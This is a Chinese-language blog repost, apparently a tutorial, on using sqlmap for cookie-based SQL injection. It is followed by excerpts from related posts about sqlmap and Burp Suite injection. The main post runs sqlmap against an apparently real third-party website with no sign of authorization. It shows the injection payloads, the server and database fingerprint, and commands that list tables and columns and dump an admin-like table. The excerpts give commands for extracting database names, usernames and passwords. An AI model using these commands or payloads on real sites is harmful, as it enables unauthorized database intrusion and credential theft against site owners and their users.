sqlmap cookies站点的中转注入

如果说站点装了防注入程序 拿我们正规的注入就不成效果,就用到cookie中转注入

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2

Place: Cookie
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=230 AND 1870=1870

Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-3659 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(117)&CHR(120)&CHR(97)&CHR(113)&CHR(106)&CHR(83)&CHR(65)&CHR(100)&CHR(105)&CHR(111)&CHR(87)&CHR(110)&CHR(113)&CHR(112)&CHR(113)&CHR(113)&CHR(115)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[23:30:15] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[23:30:15] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/xaweichi.com‘

可以看到是cookies方式的注入

猜解表段也是一样的

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2

猜解字段

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2

然后猜解内容

[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| classid | numeric |
| id | numeric |
| orderid | numeric |
| title | non-numeric |

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2

原文地址:https://www.cnblogs.com/bzdmz/p/11107465.html

时间: 2024-11-03 01:32:30

sqlmap cookies站点的中转注入的相关文章

中转注入

没技术含量,纯属记录之前学过的一个注入方法.百度一大堆的东西,以前写的,留恋...o(∩_∩)o 遇到这种情况很蛋疼...无法注入,那咋办啊?以前很多时候都是放弃了,知道有一天遇到中转注入,嘿嘿,我邪恶了.... 第一个框改为?后面的东西,把数值去掉 第二个框第三个框就是url,不要?后面的一串 第四个不用管他 第五个就把=后面写成注入点的数值 点击生成asp文件jmCook.asp 在同一个目录下就会生成的asp文件 然后通过IIS简易服务器将cookie中转到本地 接下来就双击简易IIS服务

1.sqlmap学习笔记之Access注入

使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] resuming back-end DBMS 'microsoft access' ------------------------- 2.猜数据库表,输入: .sqlmap.py -u "http:/

3.sqlmap学习笔记之Cookie注入

Cookie注入: 1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表. sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2 假设返回内容如下,说明是access数据库. ------------------------- [INFO] resuming ba

利用sqlmap实现基本的SQL注入

注入基本上可分为以下三种:1.get类:sqlmap -u "http://xxx?x=xx"2.post类: sqlmap -r "xxx.txt"3.cookie类: sqlmap -u "http://xxx?x=xx" –cookie="x=xx&y=yy" --level=2 一 get类 1,枚举数据库:sqlmap -u "http://xxx?x=xx" --dbs 2,获取当前数据

sqlmap完成简单的sql注入

扫描目标站点,是否存在注入 --users获取用户名 --dump --tables探测表和数据库信息 跑出来的字段 admin --dump -T admin -C admin,password暴库获取用户名和密码^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

sqlmap post搜索框的注入

post注入框的注入原理 大家可以自己百度一下哦! 要进行post注入我们首先要抓包 .. 用burpsuite或fildder 打开浏览器,设置代理,如代理8080端口 好了 随便输入一个1字 burpsuite已经抓到包了 key=1&x=23&y=4 然后我们启动sqlmap 构造一下(直接在命令行输入) sqlmap -u http://****.cn/product.asp --data "key=1&x=23&y=4"Place: POSTP

2.sqlmap学习笔记之MySQL注入

1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------------------------------ available databases[1] [*] student ------------------------------ 2.获取数据库中的表名: .sqlmap.py -u "http://abcd****efg.asp?id=7"

burpsuite+sqlmap跨登录验证SQL注入

(我操作的系统是kali linux) 1.利用burpsuite代理设置拦截浏览器请求(具体操作步骤可参考:http://www.cnblogs.com/hito/p/4495432.html) 2.拦截完成的请求具体内容在“Proxy--Intercept”中完整展现 3.右键选中-copy to file,保存到桌面(txt格式) 4.应用程序中调用sqlmap,输入命令 sqlmap -r xxx.txt -tfUPass(文件我是放在桌面,直接拖到终端) 就开始扫描第一步拦截的目标链接

注入神器-sqlmap

此文章写的不错: http://pnig0s1992.blog.51cto.com/393390/402775 推荐 sqlmap 官网:http://sqlmap.org/ https://github.com/sqlmapproject/sqlmap/zipball/master sqlmap 的运行需要python环境. 直接到官网下载安装即可. 下载 2.7.8 版本,链接如下: https://www.python.org/downloads/release/python-278/ 简